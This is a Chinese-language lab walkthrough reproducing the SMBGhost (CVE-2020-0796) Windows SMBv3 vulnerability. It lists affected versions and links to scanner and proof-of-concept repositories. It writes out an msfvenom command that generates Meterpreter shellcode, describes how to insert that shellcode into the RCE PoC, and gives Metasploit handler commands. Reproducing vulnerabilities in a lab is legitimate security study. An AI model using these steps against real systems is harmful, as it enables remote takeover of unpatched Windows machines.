天天看點

《永恒之黑》CVE-2020-0796漏洞複現

《永恒之黑》CVE-2020-0796漏洞複現

  • |漏洞簡介

    2020年3月12日,微軟正式釋出CVE-2020-0796高危漏洞更新檔,本漏洞源于SMBv3沒有正确處理壓縮的資料包,在解壓資料包的時候使用用戶端傳過來的長度進行解壓時,并沒有檢查長度是否合法,最終導緻整數溢出。利用該漏洞,攻擊方可直接遠端攻擊SMB服務端遠端執行任意惡意代碼,CVE-2020-0796漏洞與“永恒之藍”系列漏洞極為相似,都是利用Windows SMB漏洞遠端攻擊擷取系統最高權限。

  • |影響版本

    Windows 10 Version 1903 for 32-bit Systems

    Windows 10 Version 1903 for x64-based Systems

    Windows 10 Version 1903 for ARM64-based Systems

    Windows Server, Version 1903 (Server Core installation)

    Windows 10 Version 1909 for 32-bit Systems

    Windows 10 Version 1909 for x64-based Systems

    Windows 10 Version 1909 for ARM64-based Systems

    Windows Server, Version 1909 (Server Core installation)

  • |漏洞複現

    1.環境搭建:

    kali 攻擊機:192.168.87.128

    win10靶機:192.168.87.143

    2.檢視win10靶機版本,win+r,輸入winver

    《永恒之黑》CVE-2020-0796漏洞複現
    3.使用SMBGhost工具檢測win靶機是否存在漏洞,工具下載下傳:https://github.com/ollypwn/SMBGhost
    《永恒之黑》CVE-2020-0796漏洞複現
    《永恒之黑》CVE-2020-0796漏洞複現
    也可以使用藍屏payload,驗證漏洞。藍屏poc下載下傳:https://github.com/chompie1337/SMBGhost_RCE_PoC
    《永恒之黑》CVE-2020-0796漏洞複現
    win10出現藍屏,說明存在漏洞
    《永恒之黑》CVE-2020-0796漏洞複現

    當然也有其他很多方法,如:

    https://github.com/joaozietolie/CVE-2020-0796-Checker

    http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

    4.利用msfvenom生成的exp反彈shell

    msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -b '\x00' -i 1 -f python>exploit

    《永恒之黑》CVE-2020-0796漏洞複現
    msf生成的exploit
    《永恒之黑》CVE-2020-0796漏洞複現
    替換SMBGhost_RCE_PoC中的exploit.py,并把buf改為USER_PAYLOAD
    《永恒之黑》CVE-2020-0796漏洞複現

    5.替換好了,設定msf監聽

    msfconsole //運作msf

    use exploit/multi/handler //開啟監聽子產品

    set payload windows/x64/meterpreter/bind_tcp //設定反彈模式

    set rhost 192.168.87.143 //設定目标靶機ip

    《永恒之黑》CVE-2020-0796漏洞複現